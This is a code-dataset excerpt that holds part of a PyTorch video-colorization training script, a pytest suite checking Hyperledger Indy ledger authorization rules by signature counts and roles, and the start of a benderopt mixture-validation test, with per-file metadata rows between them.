                    p_t_warp = pwcnet.PWCNetBackward((p_t_last + 1) / 2, o_t_last_2_t)
                else:
                    x_t_last = in_part[iter_frame - 1].cuda()
                    p_t_last = p_t.detach()
                    p_t_last.requires_grad = False
                    # o_t_last_2_t o_t_first_2_t range is [-20, +20]
                    o_t_last_2_t = pwcnet.PWCEstimate(flownet, x_t, x_t_last)
                    o_t_first_2_t = pwcnet.PWCEstimate(flownet,x_t, x_0)
                    # y_t_warp, y_t_warp_long range is [0, 1]
                    x_t_warp = pwcnet.PWCNetBackward((x_t_last + 1) / 2, o_t_last_2_t)
                    p_t_warp = pwcnet.PWCNetBackward((p_t_last + 1) / 2, o_t_last_2_t)
                    x_t_warp_long = pwcnet.PWCNetBackward((x_0 + 1) / 2, o_t_first_2_t)
                    p_t_warp_long = pwcnet.PWCNetBackward((p_t_0 + 1) / 2, o_t_first_2_t)
                # Generator output
                p_t, lstm_state = generatorNet(x_t, p_t_last, lstm_state)
                # detach the recurrent state so backprop does not span frames
                lstm_state = utils.repackage_hidden(lstm_state)
                if iter_frame == 1:
                    # short-term temporal loss: prediction should match the
                    # flow-warped previous prediction, weighted by a mask that
                    # down-weights pixels where warped input disagrees with
                    # the current input (occlusion handling)
                    mask_flow = torch.exp( -opt.mask_para * torch.sum((x_t + 1) / 2 - x_t_warp, dim=1).pow(2) ).unsqueeze(1)
                    loss_flow += criterion_L1(mask_flow * (p_t + 1) / 2, mask_flow * p_t_warp)
                elif iter_frame > 1:
                    mask_flow = torch.exp( -opt.mask_para * torch.sum((x_t + 1) / 2 - x_t_warp, dim=1).pow(2) ).unsqueeze(1)
                    loss_flow += criterion_L1(mask_flow * (p_t + 1) / 2, mask_flow * p_t_warp)
                    # long-term temporal loss against the first frame's prediction
                    mask_flow_long = torch.exp( -opt.mask_para * torch.sum((x_t + 1) / 2 - x_t_warp_long, dim=1).pow(2) ).unsqueeze(1)
                    loss_flow_long += criterion_L1(mask_flow_long * (p_t + 1) / 2, mask_flow_long * p_t_warp_long)
                # Fake samples (detached so the D loss does not reach the generator)
                fake_scalar = discriminator(x_t, p_t.detach())
                loss_fake = criterion_MSE(fake_scalar, fake)
                # True samples
                true_scalar = discriminator(x_t, y_t)
                loss_true = criterion_MSE(true_scalar, valid)
                # Train Discriminator
                loss_D += 0.5 * (loss_fake + loss_true)
                # Train Generator
                # GAN Loss
                fake_scalar = discriminator(x_t, p_t)
                loss_G += criterion_MSE(fake_scalar, valid)
                # Pixel-level loss
                loss_L1 += criterion_L1(p_t, y_t)
            # Overall Loss and optimize
            loss = loss_L1 + opt.lambda_flow * loss_flow + opt.lambda_flow_long * loss_flow_long + opt.lambda_gan * loss_G
            loss.backward()
            loss_D.backward()
            optimizer_G.step()
            optimizer_D.step()
            # Determine approximate time left
            iters_done = epoch * len(dataloader) + iteration
            iters_left = opt.epochs * len(dataloader) - iters_done
            time_left = datetime.timedelta(seconds = iters_left * (time.time() - prev_time))
            prev_time = time.time()
            # Print log
            print("\r[Epoch %d/%d] [Batch %d/%d] [L1 Loss: %.4f] [Flow Loss Short: %.8f] [Flow Loss Long: %.8f] [G Loss: %.4f] [D Loss: %.4f] Time_left: %s" %
                ((epoch + 1), opt.epochs, iteration, len(dataloader), loss_L1.item(), loss_flow.item(), loss_flow_long.item(), loss_G.item(), loss_D.item(), time_left))
            # Save model at certain epochs or iterations
            save_model(opt, (epoch + 1), (iters_done + 1), len(dataloader), generatorNet)
            # Learning rate decrease at certain epochs
            adjust_learning_rate(opt, (epoch + 1), (iters_done + 1), optimizer_G)
            adjust_learning_rate(opt, (epoch + 1), (iters_done + 1), optimizer_D)
def Train_No_GAN(opt): # w / o GAN
    """Train the video colorization generator with L1 + optical-flow
    temporal-consistency losses only (no GAN discriminator).

    Mirrors the GAN training routine elsewhere in this file, but drives a
    single Adam optimizer on the generator. `opt` carries every
    hyper-parameter (lr_g, epochs, iter_frames, lambda_flow, mask_para, ...)
    — presumably defined by an argparse block outside this chunk; confirm
    against the caller.
    """
    # ----------------------------------------
    # Network training parameters
    # ----------------------------------------
    # cudnn benchmark
    cudnn.benchmark = opt.cudnn_benchmark
    # Loss functions
    criterion_L1 = torch.nn.L1Loss().cuda()
    # Initialize Generator and the PWC-Net used for optical-flow estimation
    generatorNet = utils.create_generator(opt)
    flownet = utils.create_pwcnet(opt)
    # To device
    if opt.multi_gpu:
        generatorNet = nn.DataParallel(generatorNet)
        generatorNet = generatorNet.cuda()
        flownet = nn.DataParallel(flownet)
        flownet = flownet.cuda()
    else:
        generatorNet = generatorNet.cuda()
        flownet = flownet.cuda()
    # Optimizers
    optimizer_G = torch.optim.Adam(generatorNet.parameters(), lr = opt.lr_g, betas = (opt.b1, opt.b2), weight_decay = opt.weight_decay)

    # Learning rate decrease
    def adjust_learning_rate(opt, epoch, iteration, optimizer):
        """Decay the initial LR by "lr_decrease_factor" every
        "lr_decrease_epoch" epochs (mode 'epoch') or every
        "lr_decrease_iter" iterations (mode 'iter')."""
        if opt.lr_decrease_mode == 'epoch':
            lr = opt.lr_g * (opt.lr_decrease_factor ** (epoch // opt.lr_decrease_epoch))
            for param_group in optimizer.param_groups:
                param_group['lr'] = lr
        if opt.lr_decrease_mode == 'iter':
            lr = opt.lr_g * (opt.lr_decrease_factor ** (iteration // opt.lr_decrease_iter))
            for param_group in optimizer.param_groups:
                param_group['lr'] = lr

    # Save the model if pre_train == True
    def save_model(opt, epoch, iteration, len_dataset, generator):
        """Save the model at "checkpoint_interval" and its multiple"""
        # When wrapped in DataParallel, the real network lives in .module
        target = generator.module if opt.multi_gpu == True else generator
        if opt.save_mode == 'epoch':
            if (epoch % opt.save_by_epoch == 0) and (iteration % len_dataset == 0):
                if opt.save_name_mode:
                    torch.save(target, 'Pre_%s_epoch%d_bs%d.pth' % (opt.task, epoch, opt.batch_size))
                    print('The trained model is successfully saved at epoch %d' % (epoch))
        if opt.save_mode == 'iter':
            if iteration % opt.save_by_iter == 0:
                if opt.save_name_mode:
                    torch.save(target, 'Pre_%s_iter%d_bs%d.pth' % (opt.task, iteration, opt.batch_size))
                    print('The trained model is successfully saved at iteration %d' % (iteration))

    # ----------------------------------------
    # Network dataset
    # ----------------------------------------
    # Define the class list
    imglist = utils.text_readlines('videocolor_linux.txt')
    classlist = utils.get_dirs(opt.baseroot)
    '''
    imgnumber = len(imglist) - (len(imglist) % opt.batch_size)
    imglist = imglist[:imgnumber]
    '''
    # Define the dataset
    trainset = dataset.MultiFramesDataset(opt, imglist, classlist)
    print('The overall number of classes:', len(trainset))
    # Define the dataloader
    dataloader = utils.create_dataloader(trainset, opt)
    # ----------------------------------------
    # Training
    # ----------------------------------------
    # Count start time
    prev_time = time.time()
    # For loop training
    for epoch in range(opt.epochs):
        for iteration, (in_part, out_part) in enumerate(dataloader):
            # Train Generator
            optimizer_G.zero_grad()
            lstm_state = None
            loss_flow = 0
            loss_flow_long = 0
            loss_L1 = 0
            x_0 = in_part[0].cuda()
            p_t_0 = in_part[0].cuda()
            for iter_frame in range(opt.iter_frames):
                # Read data
                x_t = in_part[iter_frame].cuda()
                y_t = out_part[iter_frame].cuda()
                # Initialize the second input and compute flow loss
                if iter_frame == 0:
                    # BUGFIX: size the blank "previous prediction" from the
                    # actual batch; the last batch of an epoch may be smaller
                    # than opt.batch_size, which would previously mismatch.
                    p_t_last = torch.zeros(x_t.size(0), opt.out_channels, opt.resize_h, opt.resize_w, device = x_t.device)
                elif iter_frame == 1:
                    x_t_last = in_part[iter_frame - 1].cuda()
                    # Detach so the flow loss does not backprop through the
                    # previous frame's generator pass
                    p_t_last = p_t.detach()
                    p_t_0 = p_t.detach()
                    p_t_last.requires_grad = False
                    p_t_0.requires_grad = False
                    # o_t_last_2_t range is [-20, +20]
                    o_t_last_2_t = pwcnet.PWCEstimate(flownet, x_t, x_t_last)
                    # warped tensors range is [0, 1] (inputs mapped from [-1, 1])
                    x_t_warp = pwcnet.PWCNetBackward((x_t_last + 1) / 2, o_t_last_2_t)
                    p_t_warp = pwcnet.PWCNetBackward((p_t_last + 1) / 2, o_t_last_2_t)
                else:
                    x_t_last = in_part[iter_frame - 1].cuda()
                    p_t_last = p_t.detach()
                    p_t_last.requires_grad = False
                    # o_t_last_2_t / o_t_first_2_t range is [-20, +20]
                    o_t_last_2_t = pwcnet.PWCEstimate(flownet, x_t, x_t_last)
                    o_t_first_2_t = pwcnet.PWCEstimate(flownet, x_t, x_0)
                    # short-term and long-term warps, range [0, 1]
                    x_t_warp = pwcnet.PWCNetBackward((x_t_last + 1) / 2, o_t_last_2_t)
                    p_t_warp = pwcnet.PWCNetBackward((p_t_last + 1) / 2, o_t_last_2_t)
                    x_t_warp_long = pwcnet.PWCNetBackward((x_0 + 1) / 2, o_t_first_2_t)
                    p_t_warp_long = pwcnet.PWCNetBackward((p_t_0 + 1) / 2, o_t_first_2_t)
                # Generator output
                p_t, lstm_state = generatorNet(x_t, p_t_last, lstm_state)
                lstm_state = utils.repackage_hidden(lstm_state)
                # Occlusion-aware masks: down-weight pixels where the input
                # warp disagrees with the current frame
                if iter_frame == 1:
                    mask_flow = torch.exp( -opt.mask_para * torch.sum((x_t + 1) / 2 - x_t_warp, dim=1).pow(2) ).unsqueeze(1)
                    loss_flow += criterion_L1(mask_flow * (p_t + 1) / 2, mask_flow * p_t_warp)
                elif iter_frame > 1:
                    mask_flow = torch.exp( -opt.mask_para * torch.sum((x_t + 1) / 2 - x_t_warp, dim=1).pow(2) ).unsqueeze(1)
                    loss_flow += criterion_L1(mask_flow * (p_t + 1) / 2, mask_flow * p_t_warp)
                    mask_flow_long = torch.exp( -opt.mask_para * torch.sum((x_t + 1) / 2 - x_t_warp_long, dim=1).pow(2) ).unsqueeze(1)
                    loss_flow_long += criterion_L1(mask_flow_long * (p_t + 1) / 2, mask_flow_long * p_t_warp_long)
                # Pixel-level loss
                loss_L1 += criterion_L1(p_t, y_t)
            # Overall Loss and optimize
            loss = loss_L1 + opt.lambda_flow * loss_flow + opt.lambda_flow_long * loss_flow_long
            loss.backward()
            optimizer_G.step()
            # Determine approximate time left
            iters_done = epoch * len(dataloader) + iteration
            iters_left = opt.epochs * len(dataloader) - iters_done
            time_left = datetime.timedelta(seconds = iters_left * (time.time() - prev_time))
            prev_time = time.time()
            # BUGFIX: the flow losses remain plain ints (0) when
            # opt.iter_frames < 2, so guard the .item() calls
            flow_val = loss_flow.item() if torch.is_tensor(loss_flow) else float(loss_flow)
            flow_long_val = loss_flow_long.item() if torch.is_tensor(loss_flow_long) else float(loss_flow_long)
            # Print log
            print("\r[Epoch %d/%d] [Batch %d/%d] [L1 Loss: %.4f] [Flow Loss Short: %.8f] [Flow Loss Long: %.8f] Time_left: %s" %
                ((epoch + 1), opt.epochs, iteration, len(dataloader), loss_L1.item(), flow_val, flow_long_val, time_left))
            # Save model at certain epochs or iterations
            save_model(opt, (epoch + 1), (iters_done + 1), len(dataloader), generatorNet)
            # Learning rate decrease at certain epochs
            adjust_learning_rate(opt, (epoch + 1), (iters_done + 1), optimizer_G)
| 45.336257
| 186
| 0.559723
| 3,873
| 31,010
| 4.226439
| 0.059385
| 0.00782
| 0.017594
| 0.012707
| 0.975075
| 0.973486
| 0.970432
| 0.970432
| 0.961879
| 0.953021
| 0
| 0.01484
| 0.308965
| 31,010
| 684
| 187
| 45.336257
| 0.749032
| 0.141535
| 0
| 0.897059
| 0
| 0.009804
| 0.075774
| 0.017152
| 0
| 0
| 0
| 0
| 0
| 1
| 0.029412
| false
| 0
| 0.034314
| 0
| 0.063725
| 0.061275
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1bfce171449b5e7ea033125f3988357e625d424b
| 17,121
|
py
|
Python
|
indy_common/test/auth/metadata/test_auth_rule_with_metadata_simple.py
|
Rob-S/indy-node
|
0aefbda62c5a7412d7e03b2fb9795c500ea67e9f
|
[
"Apache-2.0"
] | 627
|
2017-07-06T12:38:08.000Z
|
2022-03-30T13:18:43.000Z
|
indy_common/test/auth/metadata/test_auth_rule_with_metadata_simple.py
|
Rob-S/indy-node
|
0aefbda62c5a7412d7e03b2fb9795c500ea67e9f
|
[
"Apache-2.0"
] | 580
|
2017-06-29T17:59:57.000Z
|
2022-03-29T21:37:52.000Z
|
indy_common/test/auth/metadata/test_auth_rule_with_metadata_simple.py
|
Rob-S/indy-node
|
0aefbda62c5a7412d7e03b2fb9795c500ea67e9f
|
[
"Apache-2.0"
] | 704
|
2017-06-29T17:45:34.000Z
|
2022-03-30T07:08:58.000Z
|
from indy_common.authorize.auth_constraints import AuthConstraint, IDENTITY_OWNER, AuthConstraintForbidden
from indy_common.constants import ENDORSER
from indy_common.test.auth.metadata.helper import validate, PLUGIN_FIELD, Action
from plenum.common.constants import TRUSTEE
MAX_SIG_COUNT = 3
def test_plugin_simple_rule_1_sig_owner_no_endorser(write_auth_req_validator, write_request_validation,
                                                    signatures, is_owner, amount):
    """Owner-authored request without an endorser under a 1-sig owner rule."""
    constraint = AuthConstraint(role=IDENTITY_OWNER, sig_count=1, need_to_be_owner=True,
                                metadata={PLUGIN_FIELD: 2})
    expected = [Action(author=IDENTITY_OWNER, endorser=None, sigs={IDENTITY_OWNER: n},
                       is_owner=True, amount=2, extra_sigs=False)
                for n in range(1, MAX_SIG_COUNT + 1)]
    validate(auth_constraint=constraint,
             valid_actions=expected,
             author=IDENTITY_OWNER, endorser=None,
             all_signatures=signatures, is_owner=is_owner, amount=amount,
             write_auth_req_validator=write_auth_req_validator,
             write_request_validation=write_request_validation)
def test_plugin_simple_rule_1_sig_owner_endorser(write_auth_req_validator, write_request_validation,
                                                 signatures, is_owner, amount):
    """Owner-authored, endorser-submitted request under a 1-sig owner rule."""
    constraint = AuthConstraint(role=IDENTITY_OWNER, sig_count=1, need_to_be_owner=True,
                                metadata={PLUGIN_FIELD: 2})
    expected = [Action(author=IDENTITY_OWNER, endorser=ENDORSER,
                       sigs={IDENTITY_OWNER: n1, ENDORSER: n2},
                       is_owner=True, amount=2, extra_sigs=True)
                for n1 in range(1, MAX_SIG_COUNT + 1)
                for n2 in range(1, MAX_SIG_COUNT + 1)]
    validate(auth_constraint=constraint,
             valid_actions=expected,
             author=IDENTITY_OWNER, endorser=ENDORSER,
             all_signatures=signatures, is_owner=is_owner, amount=amount,
             write_auth_req_validator=write_auth_req_validator,
             write_request_validation=write_request_validation)
def test_plugin_simple_rule_1_sig_endorser_no_endorser(write_auth_req_validator, write_request_validation,
                                                       signatures, is_owner, amount):
    """Endorser-authored request without a separate endorser, 1-sig rule."""
    constraint = AuthConstraint(role=ENDORSER, sig_count=1, need_to_be_owner=True,
                                metadata={PLUGIN_FIELD: 2})
    expected = [Action(author=ENDORSER, endorser=None, sigs={ENDORSER: n},
                       is_owner=True, amount=2, extra_sigs=True)
                for n in range(1, MAX_SIG_COUNT + 1)]
    validate(auth_constraint=constraint,
             valid_actions=expected,
             author=ENDORSER, endorser=None,
             all_signatures=signatures, is_owner=is_owner, amount=amount,
             write_auth_req_validator=write_auth_req_validator,
             write_request_validation=write_request_validation)
def test_plugin_simple_rule_1_sig_endorser_endorser(write_auth_req_validator, write_request_validation,
                                                    signatures, is_owner, amount):
    """Endorser-authored request that is also endorser-submitted, 1-sig rule."""
    constraint = AuthConstraint(role=ENDORSER, sig_count=1, need_to_be_owner=True,
                                metadata={PLUGIN_FIELD: 2})
    expected = [Action(author=ENDORSER, endorser=ENDORSER, sigs={ENDORSER: n},
                       is_owner=True, amount=2, extra_sigs=True)
                for n in range(1, MAX_SIG_COUNT + 1)]
    validate(auth_constraint=constraint,
             valid_actions=expected,
             author=ENDORSER, endorser=ENDORSER,
             all_signatures=signatures, is_owner=is_owner, amount=amount,
             write_auth_req_validator=write_auth_req_validator,
             write_request_validation=write_request_validation)
def test_plugin_simple_rule_1_sig_trustee_no_endorser(write_auth_req_validator, write_request_validation,
                                                      signatures, is_owner, amount):
    """Trustee-authored request without an endorser under a 1-sig endorser rule."""
    constraint = AuthConstraint(role=ENDORSER, sig_count=1, need_to_be_owner=True,
                                metadata={PLUGIN_FIELD: 2})
    expected = [Action(author=TRUSTEE, endorser=None,
                       sigs={ENDORSER: n1, TRUSTEE: n2},
                       is_owner=True, amount=2, extra_sigs=True)
                for n1 in range(1, MAX_SIG_COUNT + 1)
                for n2 in range(1, MAX_SIG_COUNT + 1)]
    validate(auth_constraint=constraint,
             valid_actions=expected,
             author=TRUSTEE, endorser=None,
             all_signatures=signatures, is_owner=is_owner, amount=amount,
             write_auth_req_validator=write_auth_req_validator,
             write_request_validation=write_request_validation)
def test_plugin_simple_rule_1_sig_trustee_endorser(write_auth_req_validator, write_request_validation,
                                                   signatures, is_owner, amount):
    """Trustee-authored, endorser-submitted request under a 1-sig endorser rule.

    BUGFIX: the original comprehension looped over an unused variable `s1`
    in addition to `s2`/`s3`, so every expected Action appeared
    MAX_SIG_COUNT times in valid_actions.  The set of distinct expected
    actions is unchanged; only the redundant duplicates are removed.
    """
    constraint = AuthConstraint(role=ENDORSER, sig_count=1, need_to_be_owner=True,
                                metadata={PLUGIN_FIELD: 2})
    expected = [Action(author=TRUSTEE, endorser=ENDORSER,
                       sigs={TRUSTEE: n1, ENDORSER: n2},
                       is_owner=True, amount=2, extra_sigs=True)
                for n1 in range(1, MAX_SIG_COUNT + 1)
                for n2 in range(1, MAX_SIG_COUNT + 1)]
    validate(auth_constraint=constraint,
             valid_actions=expected,
             author=TRUSTEE, endorser=ENDORSER,
             all_signatures=signatures, is_owner=is_owner, amount=amount,
             write_auth_req_validator=write_auth_req_validator,
             write_request_validation=write_request_validation)
def test_plugin_simple_rule_1_sig_all_roles_owner_no_endorser(write_auth_req_validator, write_request_validation,
                                                              signatures, is_owner, off_ledger_signature, amount):
    """Any-role 1-sig rule: owner author, no endorser."""
    constraint = AuthConstraint(role='*', sig_count=1, need_to_be_owner=True,
                                off_ledger_signature=off_ledger_signature,
                                metadata={PLUGIN_FIELD: 2})
    expected = [Action(author=IDENTITY_OWNER, endorser=None, sigs={IDENTITY_OWNER: n},
                       is_owner=True, amount=2, extra_sigs=False)
                for n in range(1, MAX_SIG_COUNT + 1)]
    validate(auth_constraint=constraint,
             valid_actions=expected,
             author=IDENTITY_OWNER, endorser=None,
             all_signatures=signatures, is_owner=is_owner, amount=amount,
             write_auth_req_validator=write_auth_req_validator,
             write_request_validation=write_request_validation)
def test_plugin_simple_rule_1_sig_all_roles_owner_endorser(write_auth_req_validator, write_request_validation,
                                                           signatures, is_owner, off_ledger_signature, amount):
    """Any-role 1-sig rule: owner author submitted through an endorser."""
    constraint = AuthConstraint(role='*', sig_count=1, need_to_be_owner=True,
                                off_ledger_signature=off_ledger_signature,
                                metadata={PLUGIN_FIELD: 2})
    expected = [Action(author=IDENTITY_OWNER, endorser=ENDORSER,
                       sigs={IDENTITY_OWNER: n1, ENDORSER: n2},
                       is_owner=True, amount=2, extra_sigs=True)
                for n1 in range(1, MAX_SIG_COUNT + 1)
                for n2 in range(1, MAX_SIG_COUNT + 1)]
    validate(auth_constraint=constraint,
             valid_actions=expected,
             author=IDENTITY_OWNER, endorser=ENDORSER,
             all_signatures=signatures, is_owner=is_owner, amount=amount,
             write_auth_req_validator=write_auth_req_validator,
             write_request_validation=write_request_validation)
def test_plugin_simple_rule_1_sig_all_roles_trustee_no_endorser(write_auth_req_validator, write_request_validation,
                                                                signatures, is_owner, off_ledger_signature, amount):
    """Any-role 1-sig rule: trustee author, no endorser."""
    constraint = AuthConstraint(role='*', sig_count=1, need_to_be_owner=True,
                                off_ledger_signature=off_ledger_signature,
                                metadata={PLUGIN_FIELD: 2})
    expected = [Action(author=TRUSTEE, endorser=None, sigs={TRUSTEE: n1},
                       is_owner=True, amount=2, extra_sigs=True)
                for n1 in range(1, MAX_SIG_COUNT + 1)]
    validate(auth_constraint=constraint,
             valid_actions=expected,
             author=TRUSTEE, endorser=None,
             all_signatures=signatures, is_owner=is_owner, amount=amount,
             write_auth_req_validator=write_auth_req_validator,
             write_request_validation=write_request_validation)
def test_plugin_simple_rule_1_sig_all_roles_trustee_endorser(write_auth_req_validator, write_request_validation,
                                                             signatures, is_owner, off_ledger_signature, amount):
    """Any-role 1-sig rule: trustee author submitted through an endorser."""
    constraint = AuthConstraint(role='*', sig_count=1, need_to_be_owner=True,
                                off_ledger_signature=off_ledger_signature,
                                metadata={PLUGIN_FIELD: 2})
    expected = [Action(author=TRUSTEE, endorser=ENDORSER,
                       sigs={TRUSTEE: n1, ENDORSER: n2},
                       is_owner=True, amount=2, extra_sigs=True)
                for n1 in range(1, MAX_SIG_COUNT + 1)
                for n2 in range(1, MAX_SIG_COUNT + 1)]
    validate(auth_constraint=constraint,
             valid_actions=expected,
             author=TRUSTEE, endorser=ENDORSER,
             all_signatures=signatures, is_owner=is_owner, amount=amount,
             write_auth_req_validator=write_auth_req_validator,
             write_request_validation=write_request_validation)
def test_plugin_simple_rule_3_sig_trustee_no_endorser(write_auth_req_validator, write_request_validation,
                                                      signatures, is_owner, amount):
    """3-trustee-sig rule: trustee author, no endorser; ownership irrelevant."""
    constraint = AuthConstraint(role=TRUSTEE, sig_count=3, need_to_be_owner=False,
                                metadata={PLUGIN_FIELD: 2})
    expected = [Action(author=TRUSTEE, endorser=None, sigs={TRUSTEE: 3},
                       is_owner=flag, amount=2, extra_sigs=True)
                for flag in (True, False)]
    validate(auth_constraint=constraint,
             valid_actions=expected,
             author=TRUSTEE, endorser=None,
             all_signatures=signatures, is_owner=is_owner, amount=amount,
             write_auth_req_validator=write_auth_req_validator,
             write_request_validation=write_request_validation)
def test_plugin_simple_rule_3_sig_trustee_endorser(write_auth_req_validator, write_request_validation,
                                                   signatures, is_owner, amount):
    """3-trustee-sig rule: trustee author submitted through an endorser."""
    constraint = AuthConstraint(role=TRUSTEE, sig_count=3, need_to_be_owner=False,
                                metadata={PLUGIN_FIELD: 2})
    expected = [Action(author=TRUSTEE, endorser=ENDORSER,
                       sigs={TRUSTEE: 3, ENDORSER: n},
                       is_owner=flag, amount=2, extra_sigs=True)
                for n in range(1, MAX_SIG_COUNT + 1)
                for flag in (True, False)]
    validate(auth_constraint=constraint,
             valid_actions=expected,
             author=TRUSTEE, endorser=ENDORSER,
             all_signatures=signatures, is_owner=is_owner, amount=amount,
             write_auth_req_validator=write_auth_req_validator,
             write_request_validation=write_request_validation)
def test_plugin_simple_rule_3_sig_owner_no_endorser(write_auth_req_validator, write_request_validation,
                                                    signatures, is_owner, amount):
    """3-trustee-sig rule: an owner author with no endorser can never satisfy it."""
    constraint = AuthConstraint(role=TRUSTEE, sig_count=3, need_to_be_owner=False,
                                metadata={PLUGIN_FIELD: 2})
    validate(auth_constraint=constraint,
             valid_actions=[],  # no combination of owner sigs is acceptable
             author=IDENTITY_OWNER, endorser=None,
             all_signatures=signatures, is_owner=is_owner, amount=amount,
             write_auth_req_validator=write_auth_req_validator,
             write_request_validation=write_request_validation)
def test_plugin_simple_rule_3_sig_owner_endorser(write_auth_req_validator, write_request_validation,
                                                 signatures, is_owner, amount):
    """3-trustee-sig rule: owner author via endorser, trustee sigs attached."""
    constraint = AuthConstraint(role=TRUSTEE, sig_count=3, need_to_be_owner=False,
                                metadata={PLUGIN_FIELD: 2})
    expected = [Action(author=IDENTITY_OWNER, endorser=ENDORSER,
                       sigs={TRUSTEE: 3, IDENTITY_OWNER: n1, ENDORSER: n2},
                       is_owner=flag, amount=2, extra_sigs=True)
                for n1 in range(1, MAX_SIG_COUNT + 1)
                for n2 in range(1, MAX_SIG_COUNT + 1)
                for flag in (True, False)]
    validate(auth_constraint=constraint,
             valid_actions=expected,
             author=IDENTITY_OWNER, endorser=ENDORSER,
             all_signatures=signatures, is_owner=is_owner, amount=amount,
             write_auth_req_validator=write_auth_req_validator,
             write_request_validation=write_request_validation)
def test_plugin_simple_rule_0_sig_owner_no_endorser(write_auth_req_validator, write_request_validation,
                                                    signatures, is_owner, off_ledger_signature, amount):
    """0-sig any-role rule: owner author, no endorser — with or without sigs."""
    constraint = AuthConstraint(role='*', sig_count=0, need_to_be_owner=False,
                                off_ledger_signature=off_ledger_signature,
                                metadata={PLUGIN_FIELD: 2})
    # Both a completely unsigned request and any number of owner sigs are valid
    no_sig_actions = [Action(author=IDENTITY_OWNER, endorser=None, sigs={},
                             is_owner=flag, amount=2, extra_sigs=False)
                      for flag in (True, False)]
    signed_actions = [Action(author=IDENTITY_OWNER, endorser=None, sigs={IDENTITY_OWNER: n},
                             is_owner=flag, amount=2, extra_sigs=False)
                      for flag in (True, False)
                      for n in range(1, MAX_SIG_COUNT + 1)]
    validate(auth_constraint=constraint,
             valid_actions=no_sig_actions + signed_actions,
             author=IDENTITY_OWNER, endorser=None,
             all_signatures=signatures, is_owner=is_owner, amount=amount,
             write_auth_req_validator=write_auth_req_validator,
             write_request_validation=write_request_validation)
def test_plugin_simple_rule_0_sig_owner_endorser(write_auth_req_validator, write_request_validation,
                                                 signatures, is_owner, off_ledger_signature, amount):
    """0-sig any-role rule: owner author via endorser (endorser must sign)."""
    constraint = AuthConstraint(role='*', sig_count=0, need_to_be_owner=False,
                                off_ledger_signature=off_ledger_signature,
                                metadata={PLUGIN_FIELD: 2})
    expected = [Action(author=IDENTITY_OWNER, endorser=ENDORSER, sigs={ENDORSER: n},
                       is_owner=flag, amount=2, extra_sigs=True)
                for n in range(1, MAX_SIG_COUNT + 1)
                for flag in (True, False)]
    validate(auth_constraint=constraint,
             valid_actions=expected,
             author=IDENTITY_OWNER, endorser=ENDORSER,
             all_signatures=signatures, is_owner=is_owner, amount=amount,
             write_auth_req_validator=write_auth_req_validator,
             write_request_validation=write_request_validation)
def test_plugin_simple_rule_0_sig_trustee_no_endorser(write_auth_req_validator, write_request_validation,
                                                      signatures, is_owner, off_ledger_signature, amount):
    """0-sig any-role rule: trustee author, no endorser — any sig combination."""
    constraint = AuthConstraint(role='*', sig_count=0, need_to_be_owner=False,
                                off_ledger_signature=off_ledger_signature,
                                metadata={PLUGIN_FIELD: 2})
    expected = [Action(author=TRUSTEE, endorser=None, sigs=sig_combo,
                       is_owner=flag, amount=2, extra_sigs=True)
                for sig_combo in signatures
                for flag in (True, False)]
    validate(auth_constraint=constraint,
             valid_actions=expected,
             author=TRUSTEE, endorser=None,
             all_signatures=signatures, is_owner=is_owner, amount=amount,
             write_auth_req_validator=write_auth_req_validator,
             write_request_validation=write_request_validation)
def test_plugin_simple_rule_0_sig_trustee_endorser(write_auth_req_validator, write_request_validation,
                                                   signatures, is_owner, off_ledger_signature, amount):
    """0-sig any-role rule: trustee author via endorser (endorser must sign)."""
    constraint = AuthConstraint(role='*', sig_count=0, need_to_be_owner=False,
                                off_ledger_signature=off_ledger_signature,
                                metadata={PLUGIN_FIELD: 2})
    expected = [Action(author=TRUSTEE, endorser=ENDORSER, sigs={ENDORSER: n},
                       is_owner=flag, amount=2, extra_sigs=True)
                for n in range(1, MAX_SIG_COUNT + 1)
                for flag in (True, False)]
    validate(auth_constraint=constraint,
             valid_actions=expected,
             author=TRUSTEE, endorser=ENDORSER,
             all_signatures=signatures, is_owner=is_owner, amount=amount,
             write_auth_req_validator=write_auth_req_validator,
             write_request_validation=write_request_validation)
def test_plugin_simple_rule_not_allowed(write_auth_req_validator, write_request_validation,
                                        author, endorser, signatures, is_owner, amount):
    """A forbidden constraint accepts no action from any author/endorser combo."""
    validate(auth_constraint=AuthConstraintForbidden(),
             valid_actions=[],  # nothing is ever allowed
             author=author, endorser=endorser,
             all_signatures=signatures, is_owner=is_owner, amount=amount,
             write_auth_req_validator=write_auth_req_validator,
             write_request_validation=write_request_validation)
| 50.955357
| 116
| 0.635535
| 1,946
| 17,121
| 5.181912
| 0.034943
| 0.052063
| 0.06783
| 0.118703
| 0.960631
| 0.959738
| 0.959738
| 0.947739
| 0.945359
| 0.938715
| 0
| 0.012304
| 0.292682
| 17,121
| 335
| 117
| 51.107463
| 0.820396
| 0
| 0
| 0.780405
| 0
| 0
| 0.000467
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.064189
| false
| 0
| 0.013514
| 0
| 0.077703
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4002ec11f18ba86940bda122bbfda09957c38321
| 7,491
|
py
|
Python
|
benderopt/tests/validation/test_mixture.py
|
tchar/benderopt
|
83a6bbb9c5732f6232c1a1bbc971f8022a975a28
|
[
"MIT"
] | 66
|
2019-01-08T14:34:21.000Z
|
2020-10-22T00:54:58.000Z
|
benderopt/tests/validation/test_mixture.py
|
tchar/benderopt
|
83a6bbb9c5732f6232c1a1bbc971f8022a975a28
|
[
"MIT"
] | 4
|
2019-03-03T19:17:26.000Z
|
2020-10-22T18:37:30.000Z
|
benderopt/tests/validation/test_mixture.py
|
tchar/benderopt
|
83a6bbb9c5732f6232c1a1bbc971f8022a975a28
|
[
"MIT"
] | 5
|
2019-04-29T03:28:54.000Z
|
2020-10-22T19:45:40.000Z
|
import pytest
from benderopt.validation.mixture import validate_mixture, validate_mixture_value
from benderopt.validation.utils import ValidationError
def test_mixture_search_space_ok():
    """A well-formed mixture search space passes validation."""
    space = {
        "weights": [0.5, 0.5],
        "parameters": [
            {"category": "normal",
